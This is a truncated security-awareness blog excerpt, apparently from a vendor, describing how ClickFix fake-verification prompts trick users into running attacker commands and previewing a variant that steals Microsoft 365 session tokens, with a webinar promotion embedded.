It can start with something as mundane as dragging a link into your browser. Three seconds later, a threat actor has the tokens needed to take over your Microsoft 365 account, and you never did anything that traditional security awareness training would flag. You just followed what looked like a normal set of instructions.
That's the defining characteristic of modern cybercrime: it doesn't force its way in. It steps quietly into the middle of an everyday workflow and turns a routine action into the moment everything goes wrong.
Why These Attacks Keep Working
These attacks work because of habits we've all built up online. Clicking through CAPTCHAs, accepting cookie prompts, pressing a key combination to move a process along. That trained reflexiveness is exactly what attackers are counting on.
It's the core mechanic behind ClickFix attacks. Victims are shown a fake prompt instructing them to press a sequence of keyboard shortcuts, which pastes and executes attacker-supplied commands on their own machine. There’s no vulnerability to exploit and no firewall confrontation. Just a convincing lie inserted at the right moment.
ClickFix surged in 2025 and remains active, but attackers have already evolved the concept into something more sophisticated.
Figure 1 below shows the ClickFix-style fake verification prompt.
Figure 1: In a ClickFix attack, the victim follows fake verification steps that ultimately trigger malicious code on their own machine.
Learn to Wreck Hackers at Tradecraft Tuesday with Huntress Hacker tradecraft’s evolving daily, so let’s break it down on Tradecraft Tuesday! Join us monthly for an in-depth look at attacker tradecraft—no sales or product talk involved. Sign up for the series today or catch up on previous episodes. No tricks, just tradecraft. Register for Tradecraft Tuesday
A New Attack Variant Targeting Microsoft 365 Sessions
... continue reading